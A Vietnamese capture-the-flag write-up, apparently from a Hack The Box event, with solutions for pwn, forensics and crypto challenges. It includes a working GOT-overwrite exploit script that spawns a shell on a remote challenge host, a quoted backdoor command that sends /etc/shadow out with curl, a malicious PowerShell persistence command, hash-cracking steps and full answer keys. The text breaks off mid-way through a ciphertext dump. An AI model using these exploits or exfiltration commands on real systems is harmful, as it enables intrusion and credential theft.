Ở đây chúng ta sẽ overwrite GOT của strlen() -> 0x0000000000401251 để khi call strlen() sẽ nhảy đến đó và cũng nhằm mục đích sử dụng lệnh call exit() để loop vị trí call fgets từ đó đưa payload tiếp theo.

Tiếp theo, là sẽ pivot vào vị trí nào: Với mục tiệu overwrite GOT vì vậy chúng ta sẽ overwrite từ vị trí GOT của puts bởi vì địa chỉ libc của puts sẽ được đưa vào GOT puts khi puts được gọi và chúng ta có thể leak nó.

Cuối cùng overwrite GOT exit() -> 0x000000000040121b (vị trị call fgets)
  
  \=> Vậy là leak được libc.

Sau khi có libc base, chương trình sẽ loop lại fgets , chúng ta sẽ overwrite got puts thành sring "/bin/sh" để làm đối số, còn GOT strlen()->system()




Script
#!/usr/bin/env python3

    from pwn import *


    def s(p,data):
        p.send(data)
    def sl(p,data):
        p.sendline(data)
    def sla(p,msg,data):
        p.sendlineafter(msg,data)
    def sa(p,msg,data):
        p.sendafter(msg,data)
    def rl(p):
        l=p.recvline()
        return l
    def ru(p,msg):
        l=p.recvuntil(msg)
        return l
    def r(p,size):
        l=p.recv(size)
        return l

    def intFromByte(p,size):
        o = p.recv(size)[::-1].hex()
        output = '0x' + o
        leak = int(output,16)
        return leak

    def GDB(p):
        gdb.attach(p,gdbscript='''
        b*main+158
        c
        ''')
        input()
    def main():
        context.binary = exe = ELF("./no_gadgets",checksec=False)
        libc = ELF("./libc.so.6",checksec=False)
        ld = ELF("./ld-2.35.so",checksec=False)
        # p = process(exe.path)
        # GDB(p)
        p = remote('94.237.63.100',45155)
        ##################### change read-write location part 1 ###################
        rw=0x404000
        gets=0x000000000040121b
        payload=b'\x00'*128+p64(rw+0x80)+p64(gets)
        sla(p,b'Data: ',payload)

        puts=0x0000000000401251
        payload = p64(0x401036)+p64(puts)+p64(0x401056)+p64(0x401066)+p64(0x401076)+p64(gets)
        sl(p,payload)
        ru(p,b'\x0a')

        leak = intFromByte(p,6)
        print("leak:",hex(leak))
        libc.address=leak-(0x7f5c36480ed0-0x00007f5c36400000)
        print("libc:",hex(libc.address))
        binsh='/bin/sh\x00'.encode()
        system =libc.address+0x0000000000050d60

        payload = binsh+p64(system)+p64(0x401056)+p64(0x401066)+p64(0x401076)+p64(gets)
        sl(p,payload)
        p.interactive()

    if __name__ == "__main__":
        main()
        # HTB{wh0_n3eD5_rD1_wH3n_Y0u_h@v3_rBp!!!_9fa80d7e403478d67531cbbb8eab9925}

abyss

Forensics
Silicon Data Sleuthing
credit: un1dt5
Bài cho 1 file firmware OpenWrt, nhiệm vụ là tìm hiểu thông tin có trong file và trả lời câu hỏi để lấy flag. Mình sử dụng binwalk để extract file firmware
binwalk -e chal_router_dump.bin

What version of OpenWRT runs on the router (ex: 21.02.0)?
Có nhiều chỗ để tìm version của firmware OpenWrt. Ở đây mình mở file banner trong /squashfs-root/etc/ ra để đọc
_______                     ________        __
 |       |.-----.-----.-----.|  |  |  |.----.|  |_
 |   -   ||  _  |  -__|     ||  |  |  ||   _||   _|
 |_______||   __|_____|__|__||________||__|  |____|
          |__| W I R E L E S S   F R E E D O M
 -----------------------------------------------------
 OpenWrt 23.05.0, r23497-6637af95aa
 -----------------------------------------------------

What is the Linux kernel version (ex: 5.4.143)?
Cũng có nhiều chỗ để tìm Linux kernel version của firmware OpenWrt như folder trong /lib/modules/ hay ở trong /usr/lib/opkg/status (các packages đã cài thường có thông tin về kernel version). Nhưng mình chọn cách đọc Release Notes của OpenWrt phiên bản này cho nhanh :V OpenWrt 23.05.0, r23497-6637af95aa

What's the hash of the root account's password, enter the whole line (ex: root:$2$JgiaOAai....)?
Nếu tìm trong squashfs-root thì không thể tìm thấy password hash, vì đây chỉ là phân vùng read-only, còn toàn bộ thay đổi về configuragtions được lưu trong phân vùng overlay được định dạng JFFS2


Để extract phân vùng này ta dùng jefferson Comment Suggest edit
Sau khi extract thì ta vào /work/work/ và đọc file #32 (đây là file shadow) là có hash của root account, hoặc có thể giải nén sysupgrade.tgz trong /upper/ là có nguyên folder etc. Mình dùng cách thứ 2
What is the PPPoE username?
Ở trong /etc/config/ file network chứa thông tin này
config interface 'wan'
    option device 'wan'
    option proto 'pppoe'
    option username 'yohZ5ah'
    option password 'ae-h+i$i^Ngohroorie!bieng6kee7oh'
    option ipv6 'auto'

What is the PPPoE password?
Nằm cùng với username trong file network trên
What is the WiFi SSID?
Cũng ở folder /config, trong file wireless chứa thông tin WiFi
What are the 3 WAN ports that redirect traffic from WAN -> LAN (numerically sorted, comma sperated: 1488,8441,19990)?
Vẫn trong folder config, file firewall chứa redirect configuration cần tìm
config redirect
    option dest 'lan'
    option target 'DNAT'
    option name 'DB'
    option src 'wan'
    option src_dport '1778'
    option dest_ip '192.168.1.184'
    option dest_port '5881'

config redirect
    option dest 'lan'
    option target 'DNAT'
    option name 'WEB'
    option src 'wan'
    option src_dport '2289'
    option dest_ip '192.168.1.119'
    option dest_port '9889'

config redirect
    option dest 'lan'
    option target 'DNAT'
    option name 'NAS'
    option src 'wan'
    option src_dport '8088'
    option dest_ip '192.168.1.166'
    option dest_port '4431'

Dưới đây là toàn bộ câu hỏi và đáp án của bài:
+------------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|         Title          |                                                                                       Description                                                                                        |
+------------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| Silicon Data Sleuthing |                         In the dust and sand surrounding the vault, you unearth a rusty PCB... You try to read the etched print, it says Open..W...RT, a router!                         |
|                        |                                                         You hand it over to the hardware gurus and to their surprise the ROM Chip is intact!                                             |
|                        |                                                    They manage to read the data off the tarnished silicon and they give you back a firmware image.                                       |
|                        |              It's now your job to examine the firmware and maybe recover some useful information that will be important for unlocking and bypassing some of the vault's countermeasures! |
+------------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+

What version of OpenWRT runs on the router (ex: 21.02.0)
> 23.05.0                                                                                                                                                                                        
[+] Correct!

What is the Linux kernel version (ex: 5.4.143)                                                                                                                                                   
> 5.15.134                                                                                                                                                                                       
[+] Correct!

What's the hash of the root account's password, enter the whole line (ex: root:$2$JgiaOAai....)                                                                                                  
> root:$1$YfuRJudo$cXCiIJXn9fWLIt8WY2Okp1:19804:0:99999:7:::                                                                                                                                     
[+] Correct!

What is the PPPoE username                                                                                                                                                                       
> yohZ5ah                                                                                                                                                                                        
[+] Correct!

What is the PPPoE password                                                                                                                                                                       
> ae-h+i$i^Ngohroorie!bieng6kee7oh                                                                                                                                                               
[+] Correct!

What is the WiFi SSID                                                                                                                                                                            
> VLT-AP01                                                                                                                                                                                       
[+] Correct!

What is the WiFi Password                                                                                                                                                                        
> french-halves-vehicular-favorable                                                                                                                                                              
[+] Correct!

What are the 3 WAN ports that redirect traffic from WAN -> LAN (numerically sorted, comma sperated: 1488,8441,19990)                                                                             
> 1778,2289,8088                                                                                                                                                                                 
[+] Correct!

[+] Here is the flag: HTB{Y0u'v3_m4st3r3d_0p3nWRT_d4t4_3xtr4ct10n!!_cff2b8a17b727a23acefa92dcaa528ec}

Caving
credit: un1dt5
Bài cho ta folder log events của Windows. Mình dùng Hayabusa và Timeline Explorer để lọc log ra đọc những event đáng chú ý (hoặc có thể đọc chay nma mình lười ;-;)
Sau khi mở file csv được lọc ta thấy ngay được 1 log cảnh báoSuspicious Powershell Download


Decode base64 đoạn Cookie f=SFRCezFudHJ1UzEwbl9kM3QzY3QzZF8hISF9 ra ta lấy được flag

Mitigation
credit: un1dt5
Bài cho 1 instance Linux, connect vào và tìm cách loại bỏ backdoor Đầu tiên mình dùng pspy để kiểm tra các process đang chạy trên instance. Liên tục là những sessions SSH được connect vào server, và thực hiện shell script, trong đó có 1 đoạn đáng chú ý: CMD: UID=0 PID=388 | sh -c cat /tmp/.c|base64 -d|sh Đoạn lệnh này đọc file .c trong /tmp, sau đó decode base64 ra và thực thi. Mình mở file ra để đọc thử thì thấy nội dung như sau:
curl -X POST -d "data=$(base64 /etc/shadow)&i=$(hostname -I | awk '{print $1}')" https://vault.htb/hashes/save

Dấu hiệu của việc có backdoor kết nối ssh tới server linux làm mình nhớ tới XZ Utils backdoor hay CVE-2024-3094, một lỗ hổng được phát hiện gần đây trong thư viện liblzma, cụ thể trong 2 phiên bản 5.6.0 và 5.6.1. Và ở trên server Linux của bài, phiên bản 5.6.1-1 đã được cài đặt
root@5a349bb86666:~# dpkg -l | grep liblzma
ii  liblzma5:amd64              5.6.1-1               amd64        XZ-format compression library

Và mình đã tiến hành update thư viện liblzma lên phiên bản mới nhất hiện tại (hoặc cũng có thể downgrade về bản cũ hơn) tại đây
root@5a349bb86666:~# dpkg -i liblzma5_5.6.1+really5.4.5-1_amd64.deb 
Selecting previously unselected package liblzma5:amd64.
(Reading database ... 7594 files and directories currently installed.)
Preparing to unpack liblzma5_5.6.1+really5.4.5-1_amd64.deb ...
Unpacking liblzma5:amd64 (5.6.1+really5.4.5-1) over (5.6.1-1) ...
Setting up liblzma5:amd64 (5.6.1+really5.4.5-1) ...
Processing triggers for libc-bin (2.36-9+deb12u7) ...

Sau khi update xong 1 lúc thì có thông báo backdoor đã bị loại bỏ trên server
Broadcast message from root@5a349bb86666 (somewhere) (Thu May 23 09:10:38 2024)

Backdoor eliminated! Check /

Vào root và đọc flag thôi
root@5a349bb86666:~# cd /
root@5a349bb86666:/# ls
bin  boot  dev  etc  flag.txt  home  lib  lib64  media  mnt  opt  proc  root  run  sbin  srv  sys  tmp  usr  var
root@5a349bb86666:/# cat flag.txt
HTB{oH_xZ_w3_f0uNd_tH3_b4cKd0or}

Counter Defensive
+-------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+
|       Title       |                                                                       Description                                                                       |
+-------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+
| Counter Defensive |                                      As your crew prepares to infiltrate the vault, a critical discovery is made:                                       |
|                   |                     An opposing faction has embedded malware within a workstation in your infrastructure, targeting invaluable strategic plans.         |
|                   |             Your task is to dissect the compromised system, trace the malware's operational blueprint, and uncover the method of these remote attacks.  |
|                   |                                                Reveal how the enemy monitors and controls their malicious software.                                     |
|                   |                          Understanding their tactics is key to securing your plans and ensuring the success of your mission to the vault.               |
|                   |                                               To get the flag, spawn the docker instance and answer to the questions!                                   |
+-------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+

[1/10] What time did the victim finish downloading the Black-Myth-Wukong64bit.exe file? Please, submit the epoch timestamp. (ie: 168061519)
> 1713451126
[+] Correct!

[2/10] What is the full malicious command which is run whenever the user logs in? (ignore explorer.exe, ie: nc.exe 8.8.8.8 4444)
> %PWS% -nop -w h "start "$env:temp\wct98BG.tmp""
[+] Correct!

[3/10] Referring to the previous file, 'wct98BG.tmp', what is the first process that starts when the malicious file is opened? (ie: svhost.exe)
> mshta.exe
[+] Correct!

[4/10] What is the value of the variable named **cRkDgAkkUElXsDMMNfwvB3** that you get after decoding the first payload? (ie: randomvalue)
> CbO8GOb9qJiK3txOD4I31x553g
[+] Correct!

[5/10] What algorithm/encryption scheme is used in the final payload? (ie: RC4)
> AES
[+] Correct!

[6/10] What is the full path of the key containing the password to derive the encryption key? (ie: HKEY_LOCAL_MACHINE\SAM\SAM\LastSkuUpgrade)
> HKEY_CURRENT_USER\software\classes\Interface\{a7126d4c-f492-4eb9-8a2a-f673dbdd3334}\TypeLib
[+] Correct!

[7/10] What is the attacker's Telegram username? (ie: username)
> Pirate_D_Mylan
[+] Correct!

[8/10] What day did the attacker's server first send a 'new-connection' message? (Format: DD/MM/YYYY)
> 18/04/2024
[+] Correct!

[9/10] What's the password for the 7z archive                                                                                                                                                    
> arameter-none                                                                                                                                                                                  
[+] Correct!

[10/10] Submit the md5sum of the 2 files in the archive that the attacker exfiltrated (sort hashes, connect with '_', ie: 5f19a..._d9fc0...)                                                     
> 83aa3b16ba6a648c133839c8f4af6af9_ffcedf790ce7fe09e858a7ee51773bcd                                                                                                                              
[+] Correct!

[+] Here is the flag: HTB{t3l3gr4m_b4ckf1r3d!!!_9628c067df4b91776081d336bc81cecb}

Tangled Heist
credit: un1dt5
Bài cho ta 1 file network capture. Mình dùng Wireshark để phân tích.
Which is the username of the compromised user used to conduct the attack? (for example: username)
Ở packet thứ 10 ta có thể thấy username Copper trong mục NTLMSSP_AUTH, bên cạnh đó trong cả file network capture chỉ có 2 IP qua lại là 10.10.10.43 (là user) và 10.10.10.100 (là server)

What is the Distinguished Name (DN) of the Domain Controller? Don't put spaces between commas. (for example: CN=...,CN=...,DC=...,DC=...)
Sử dụng filter ldap contains "Domain Controllers" ta lọc được packet có chứa thông tin về Distinguished Name

Which is the Domain managed by the Domain Controller? (for example: corp.domain)
Kết hợp thông tin ở câu 1 và câu 2 ta có thể thấy được Domain name là recorp.htb
How many failed login attempts are recorded on the user account named 'Ranger'? (for example: 6)
Sử dụng filter ldap contains "Ranger", ta thấy được packet chứa thông tin về số lần nhập sai mật khẩu ở mục badPwdCount

Which LDAP query was executed to find all groups? (for example: (object=value))
Biết rằng lệnh do attacker execute, ta sử dụng filter ip.src==10.10.10.43 && ldap contains "group" là tìm được đáp án

How many non-standard groups exist? (for example: 1)
Sử dụng filter ldap contains "group", ở cuối ta thấy được 5 groups có tên "không bình thường lắm" (packet 347 chứa thông tin của 2 groups).

One of the non-standard users is flagged as 'disabled', which is it? (for example: username)
Để tìm được đáp án, ta kiểm tra mục "userAccountControl", mình sử dụng thêm tool này để biết được tham số của disbled account là gì và tìm được đáp án là Radiation


The attacker targeted one user writing some data inside a specific field. Which is the field name? (for example: field_name)
Ở packet 669 có một modify request đến từ ip của attacker và thông tin bị modify nằm trong wWWHomePage

Which is the new value written in it? (for example: value123)
Cũng ở trong packet trên ta tìm được thông tin bị modify là http://rebcorp.htb/qPvAdQ.php
The attacker created a new user for persistence. Which is the username and the assigned group? Don't put spaces in the answer (for example: username,group)
Ở packet 671 ta thấy request add thêm user B4ck và ở packet 675 ta thấy user B4ck trong group Enclave

The attacker obtained an hash for the user 'Hurricane' that has the UF_DONT_REQUIRE_PREAUTH flag set. Which is the correspondent plaintext for that hash? (for example: plaintext_password)

Ở packet 684 và 685 ta thấy 2 protocol là KRB5 (kerberos), và để extract và lấy được password mình sử dụng krb2john và john
Theo hướng dẫn của krb2john:
For extracting "AS-REQ (krb-as-req)" hashes,
tshark -r AD-capture-2.pcapng -T pdml > data.pdml
tshark -2 -r test.pcap -R "tcp.dstport==88 or udp.dstport==88" -T pdml >> data.pdml
./run/krb2john.py data.pdml


Dưới đây là toàn bộ câu hỏi và đáp án của bài:
+---------------+-----------------------------------------------------------------------------------------------------------------------------------------+
|     Title     |                                                               Description                                                               |
+---------------+-----------------------------------------------------------------------------------------------------------------------------------------+
| Tangled Heist |                          The survivors' group has meticulously planned the mission 'Tangled Heist' for months.                          |
|               |                                 In the desolate wasteland, what appears to be an abandoned facility is,                                 |
|               |                                             in reality, the headquarters of a rebel faction.                                            |
|               |                              This faction guards valuable data that could be useful in reaching the vault.                              |
|               |            Kaila, acting as an undercover agent, successfully infiltrates the facility using a rebel faction member's account           |
|               |                                 and gains access to a critical asset containing invaluable information.                                 |
|               | This data holds the key to both understanding the rebel faction's organization and advancing the survivors' mission to reach the vault. |
|               |                                                     Can you help her with this task?                                                    |
+---------------+-----------------------------------------------------------------------------------------------------------------------------------------+

[1/11] Which is the username of the compromised user used to conduct the attack? (for example: username)
> Copper                                                                                                                                                                                         
[+] Correct!

[2/11] What is the Distinguished Name (DN) of the Domain Controller? Don't put spaces between commas. (for example: CN=...,CN=...,DC=...,DC=...)                                                 
> CN=SRV195,OU=Domain Controllers,DC=rebcorp,DC=htb                                                                                                                                              
[+] Correct!

[3/11] Which is the Domain managed by the Domain Controller? (for example: corp.domain)                                                                                                          
> rebcorp.htb                                                                                                                                                                                    
[+] Correct!

[4/11] How many failed login attempts are recorded on the user account named 'Ranger'? (for example: 6)                                                                                          
> 14                                                                                                                                                                                             
[+] Correct!

[5/11] Which LDAP query was executed to find all groups? (for example: (object=value))                                                                                                           
> (objectClass=group)                                                                                                                                                                            
[+] Correct!

[6/11] How many non-standard groups exist? (for example: 1)                                                                                                                                      
> 5                                                                                                                                                                                              
[+] Correct!

[7/11] One of the non-standard users is flagged as 'disabled', which is it? (for example: username)                                                                                              
> Radiation                                                                                                                                                                                      
[+] Correct!

[8/11] The attacker targeted one user writing some data inside a specific field. Which is the field name? (for example: field_name)                                                              
> wWWHomePage                                                                                                                                                                                    
[+] Correct!

[9/11] Which is the new value written in it? (for example: value123)                                                                                                                             
> http://rebcorp.htb/qPvAdQ.php                                                                                                                                                                  
[+] Correct!

[10/11] The attacker created a new user for persistence. Which is the username and the assigned group? Don't put spaces in the answer (for example: username,group)                              
> B4ck,Enclave                                                                                                                                                                                   
[+] Correct!

[11/11] The attacker obtained an hash for the user 'Hurricane' that has the UF_DONT_REQUIRE_PREAUTH flag set. Which is the correspondent plaintext for that hash?  (for example: plaintext_password)                                                                                                                                                                                              
> april18                                                                                                                                                                                        
[+] Correct!

[+] Here is the flag: HTB{1nf0rm4t10n_g4th3r3d_265df1a261c0453c2f5cf070a25a216c}


Crypto
eXciting Outpost Recon
credit: Minh

Source:

from hashlib import sha256

import os

LENGTH = 32


def encrypt_data(data, k):
    data += b'\x00' * (-len(data) % LENGTH)
    encrypted = b''

    for i in range(0, len(data), LENGTH):
        chunk = data[i:i+LENGTH]

        for a, b in zip(chunk, k):
            encrypted += bytes([a ^ b])

        k = sha256(k).digest()

    return encrypted


key = os.urandom(32)

with open('plaintext.txt', 'rb') as f:
    plaintext = f.read()

assert plaintext.startswith(b'Great and Noble Leader of the Tariaki')       # have to make sure we are aptly sycophantic

with open('output.txt', 'w') as f:
    enc = encrypt_data(plaintext, key)
    f.write(enc.hex())


output.txt:

fd94e649fc4c898297f2acd4cb6661d5b69c5bb51448687f60c7531a97a0e683072bbd92adc5a871e9ab3c188741948e20ef9afe8bcc601555c29fa6b61de710a718571c09e89027413e2d94fd3126300eff106e2e4d0d4f7dc8744827731dc6ee587a982f4599a2dec253743c02b9ae1c3847a810778a20d1dff34a2c69b11c06015a8212d242ef807edbf888f56943065d730a703e27fa3bbb2f1309835469a3e0c8ded7d676ddb663fdb6508db9599018cb4049b00a5ba1690ca205e64ddc29fd74a6969b7dead69a7341ff4f32a3f09c349d92e0b21737f26a85bfa2a10d


Thấy flag được mã hóa bằng hàm enc như sau enc = encrypt_data(plaintext, key) mà key là 32 bytes ngẫu nhiên, ngoài ra ta đã biết một đoạn nhỏ của plaintext

assert plaintext.startswith(b'Great and Noble Leader of the Tariaki')

Đi sâu hơn vào hàm mã hóa mình thấy:

data += b'\x00' * (-len(data) % LENGTH) plaintext được padding thêm các bytes \x00 cho đến khi độ dài chia hết 32

chunk = data[i:i+LENGTH] sau đó các phần được chia thành các block có độ dài 32 bytes

encrypted += bytes([a ^ b]) các plaintext được mã hóa bằng cách xor các bytes với nhau với key = sha(key)


    ciphertext = enc_0 || enc_1 || ...


Solution


Từ trên mình thấy enc_0 = xor(key, plaintetx) mà plaintext này chỉ là 32 ký tự đầu thôi trong khi ta đã biết tới 40 ký tự đầu của plaintext. Từ đó theo tính chất của phếp xor mình có key_0 = xor(plaintext[:32], ciphertetx[:32])

Khi đã có được key_0 thì ta có thể dễ dàng tìm lại các key_n bằng hàm hash sha_256 và thực hiện tính toán như trên để tìm lại toàn bộ plaintext.



Full script:

from pwn import xor
from hashlib import sha256
enc = "fd94e649fc4c898297f2acd4cb6661d5b69c5bb51448687f60c7531a97a0e683072bbd92adc5a871e9ab3c188741948e20ef9afe8bcc601555c29fa6b61de710a718571c09e89027413e2d94fd3126300eff106e2e4d0d4f7dc8744827731dc6ee587a982f4599a2dec253743c02b9ae1c3847a810778a20d1dff34a2c69b11c06015a8212d242ef807edbf888f56943065d730a703e27fa3bbb2f1309835469a3e0c8ded7d676ddb663fdb6508db9599018cb4049b00a5ba1690ca205e64ddc29fd74a6969b7dead69a7341ff4f32a3f09c349d92e0b21737f26a85bfa2a10d"
enc = bytes.fromhex(enc)    

leak = ("Great and Noble Leader of the Tariaki").encode()[:32]

key = xor(leak, enc[:32])

def decrypt_data(data, k):
    LENGTH = 32
    plaintext = b''

    for i in range(0, len(data), LENGTH):
        chunk = data[i:i+LENGTH]

        for a, b in zip(chunk, k):
            plaintext += bytes([a ^ b])

        k = sha256(k).digest()

    return plaintext

print(decrypt_data(enc, key))

Flag: HTB{x0r_n0t_s0_s4f3!}
Living with Elegance
credit: Giang

Server.py:

from secrets import token_bytes, randbelow
from Crypto.Util.number import bytes_to_long as b2l

class ElegantCryptosystem:
    def __init__(self):
        self.d = 16
        self.n = 256
        self.S = token_bytes(self.d)

    def noise_prod(self):
        return randbelow(2*self.n//3) - self.n//2

    def get_encryption(self, bit):
        A = token_bytes(self.d)
        b = self.punc_prod(A, self.S) % self.n
        e = self.noise_prod()
        if bit == 1:
            return A, b + e
        else:
            return A, randbelow(self.n)

    def punc_prod(self, x, y):
        return sum(_x * _y for _x, _y in zip(x, y))

def main():
    FLAGBIN = bin(b2l(open('flag.txt', 'rb').read()))[2:]
    crypto = ElegantCryptosystem()

    while True:
        idx = input('Specify the index of the bit you want to get an encryption for : ')
        if not idx.isnumeric():
            print('The index must be an integer.')
            continue
        idx = int(idx)
        if idx < 0 or idx >= len(FLAGBIN):
            print(f'The index must lie in the interval [0, {len(FLAGBIN)-1}]')
            continue

        bit = int(FLAGBIN[idx])
        A, b = crypto.get_encryption(bit)
        print('Here is your ciphertext: ')
        print(f'A = {b2l(A)}')
        print(f'b = {b}')


if __name__ == '__main__':
    main()


Hmm, bài này thì nói sao nhỉ. Mình sẽ giải thích sơ qua cách server hoạt động nhé.


Flag được chuyển sang binary
    *
    * Cái này để xác định len_bin_flag. Nhưng có lẽ không cần thiết lắm. Nhưng mình vẫn tìm được len_bin_flag = 470
    * Khi mình nhập 1 index, server sẽ xác định xem bit ở đó là bit 0 hoặc 1.
    *
    * Đến hàm encrypt thì nếu $bit đó = 1$ thì mình có được 2 giá trị $A,b+e$, còn $bit = 0$ thì chỉ nhận được $A$ thôi.



Thứ mà mình có thể nghĩ được ra ngay là
  
  với hàm này thì $0

Nghĩ đến đây mình có 2 hướng :-1:

1 là sẽ brute force 470 bit, mỗi bit tầm 30 lần để xem là có khi nào mình thu được $b+e<0$ không, nếu có thì bit đó = 1 , không thì bit đó = 0.

2 là tìm lại S bằng LLL, hoặc là giải ma trận.



Hmm.... Đến đây thì mình thực sự cấn cấn ở cả 2 cách. Nếu theo cách 1 thì mỗi bit đều gọi đến server 30 lần thì bị time out và server bị treo không tương tác được nữa. Mà xác suất để trong 30 lần đó mà bit = 1 thu được $b+e<0$ cũng hơi hên xui.

Cách 2 nghe có vẻ khoa học hơn nhưng thực ra mình thấy nó còn no hope hơn cách 1. Kể cả coi như là tìm được $S$ đi, thì tìm được $b$, nhưng mình đâu phân biệt được 2 giá trị $b+e$ và $randbelow(n)$ để xác định ở đó là $bit = 1$ hay $bit = 0$

Sau đó mình đi bú script của anh Quốc thì thấy anh làm theo cách 1 nhưng trick lỏ:

Full Script:


from Crypto.Util.number import *
from gmpy2 import *
import math
from pwn import *   
from tqdm import tqdm
from hashlib import sha256

HOST = "94.237.51.188"
PORT = 32328
io = remote(HOST,PORT)

l = 471
flag_bin = ['0']*l
payloads = b''

for j in range(l):
    payload = b''
    for i in range(30):
        payload += str(j).encode() + b'\n'
    payloads += payload 

io.recvuntil(b'Specify the index of the bit you want to get an encryption for : ')
io.sendline(payloads[:-1])

for index in tqdm(range(l)):
    for i in range(30):
        io.recvuntil(b'b = ')
        b = int(io.recvline().strip().decode())
        if b < 0:
            flag_bin[index] = '1'


flag = ""
for char in flag_bin:
    flag += char

print(long_to_bytes(int(flag,2)))


Flag:HTB{di3tributed_error_not_e5ff97267405de047b7842e6fad3a36c}

Như mình nói ở trên thì mỗi lần brute mỗi bit 30 lần thì rất dễ bị time out. Nhưng mà khi $payloads = b'0\n0\n0\n...'$ thì không bị. Trick lỏ quá.


Bloom Bloom
credit: Giang

Source:

from random import randint, shuffle
from Crypto.Util.number import getPrime
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad
from hashlib import sha256
from secret import *
import os

assert sha256(KEY).hexdigest().startswith('786f36dd7c9d902f1921629161d9b057')

class BBS:
    def __init__(self, bits, length):
        self.bits = bits
        self.out_length = length

    def reset_params(self):
        self.state = randint(2, 2 ** self.bits - 2)
        self.m = getPrime(self.bits//2) * getPrime(self.bits//2) * randint(1, 2)

    def extract_bit(self):
        self.state = pow(self.state, 2, self.m)
        return str(self.state % 2)

    def gen_output(self):
        self.reset_params()
        out = ''
        for _ in range(self.out_length):
            out += self.extract_bit()
        return out

    def encrypt(self, msg):
        out = self.gen_output()
        key = sha256(out.encode()).digest()
        iv = os.urandom(16)
        cipher = AES.new(key, AES.MODE_CBC, iv)
        return (iv.hex(), cipher.encrypt(pad(msg.encode(), 16)).hex())

encryptor = BBS(512, 256)

enc_messages = []
for msg in MESSAGES:
    enc_messages.append([encryptor.encrypt(msg) for _ in range(10)])

enc_flag = AES.new(KEY, AES.MODE_ECB).encrypt(pad(FLAG, 16))

with open('output.txt', 'w') as f:
    f.write(f'{enc_messages}\n')
    f.write(f'{enc_flag.hex()}\n')


output.txt

[[('d5370c7ba807cdf4dd3d35cb533c526e', '659ada040f8d9e4d9d5f621d992c3ec04e0137232d0a011835aa188f3531f17632574c8d431d179786f7215c5668bdaacd23823ad319e5a4d836aeada0e5cb4a2804a59f3856ec998dd59ad3d225e76b94cf0987032db19369280a913a3c3277515550065b2bbd87eee52e58519746210823cdaf6a6fb29b67b0da457fa9bb960eec472689602c43505c57ef73567e68f2859d4c04c1045a89052f3f6907eaa1992e8e7a4d0100981d01dbf2bb6edc1a8ed195866fe49be41ae76b9ec1a220a125eb4416ef69567b4c2b65e49af0d7f6f7f2dc0b5753f6eeb3c1a5317705b466bcba6930b8aa7d9b8c1f40590a367f444cb3851cec7c5f60a47144fd204bf361a90f068b11fcf396623d64a4281c990a1aa7715da7c11db69d5c675c6b02485ccb49355135f0038ff0937e589538f910eda2546d17b4f276a3ceaec40d2dd0edf02141ab14183232e8a255c686ddda4790638c472828c4380eef9b32d9bfc242c27fcee9ae296d85e6d12e8949537a62be2f2a39ab76d72e48137d6d412a7633df1d297ea9d3e45a440fd8b1b402305ca2aad97109595648721af60a50751d2d8b27759a763f86ad9dd73a35ee33c945c0ab807b1dcb45fe939bc665f5ba457687ef24bbbcc887a2bf0aaeac06781c4c1b1ae0465f53cf83d3ce0b7b85e2cfdef5edaa9c3a3e300deb76210a01516d7fa9543ce0567e50cd9b0d5ba5309d81b7'), ('82ed475a8f9538fd70e4ff7626615c8f', '0e9119fedc117201d1bccbe294bbc71e1645fcab24a1b345a7fb926a9d0f09337a108b8c41fc53810dd1834c814edffbb816cdb3b1d1eee9984cdd9983604f39ac0d766b96ddafe70c2c20d5a4aef689afba4c9bc294498b8beff984fcffdfe6019b1a160fd78e9cb30940df2a9f29454162f7e3cbbbab95bee8b0fe334ff67742019ee406045f856df897db31eaa73e117464d755bcee4dc5ff36088d4d088c96f80142fcf62c3fb2253f449ed5094eafbf91a23b1a95ed3ed7456d2bf73bbc4a74a339e1e9b3da0836e05c117ab15b9248d946ab07da2021d4ad2b2ac1323632316735c827caffb7c886b9da3e3d4ccfb37b7d00b224cd32f57f6ea047492086bea2e9fbf80ed33714600e620aea773fe3cde7dc3d1032c32cca39d64cb87ab12344fdf7746e50564fa7b6b981f1c7b8ae85ac843d60bca27b12b82828e13368d0feadb42b30a6997dfc2cc8c636167e0c200d21e38a6210c43218cf8ae4c5e5263e2251e7288e71b8b3db439ee03af7821d2f8866200d5aaa30b7daa0bf4ccfb59eb83f6a3564591715a6410a5bd6b0ef541f3a77adacbf4bf7d049ca1176bd6efedfe87907c08037c5588cdf487f9a21d6a26ecbfada7193c734e486a959df20a2c91b47bdeec55953ba0258ad31095d0281b9a7278971e6525be049fcd42c261fe9f57490a39d9c3a216d1dc376b09a522900867733bd92f5dd503a1da3'), ('be222d2efdc80a1a23e8b8088f1e1473', 'd0244077eead4271ca8cc7fd30a60c282b89bc622f17803c5976f52ffe353d236c2b483a347425bef8403a0b415065f20d78fac48e99f48e1cc7b3a4302595792a9e96bff33129fd550240603862925e0a4f319e148eb202c7c61a97cfefb0aa5a7402d664ca64f4c83a9f6de7702f148b040c1c749e03ae6f1265d103b24f66eba3dbadbed573d9c504af84af42cbe8be23b9f6fcd61a942372362c23fae7d2beecdf7ab7ae5df92155f056fa052e292ef12e89aeb2c4ef1ece0b7cc573a1fbc03b61024ab1dccde03047a97d6b126a39d378dc764817d6b5c4a32f0d90e7bc7e591ffc368fea0253b45aae4ebb3c588d2491ecd639cf34b952ca2aa3e1d9d2f4601ef0a30aba377fe37508c092654f5e447d009a53fbb101b43b9a4b30eeafaf7211b22cfece5b735f93ad484fe0367564ddf46b72baba913643a16196224545086c8590ee6aa4a4ed464a84de0154db3542446ad0a442e2bc2335b5757633ded5a8fd74528df391f138bf27dfa2a1602f9462127c13531823acebdb2329751e7fec1a55a09d61b5f74a432c4f6e8bac71e164e790a2dc076ff44de549c3d051bed4a0e94fa703dca0d26b799e47088ff04605d9e77e0e7c10f815535393c4b9c2a2147b7fb65af99e466e221f3c00927d34a3efbacd381c312628fc9dac3b9bb151337c7251923f31b97e66a3713ef3ab6d2bae8c11434b8aa76565224215'), ('0e9aba891fbef039ebe7c5de133abaa2', 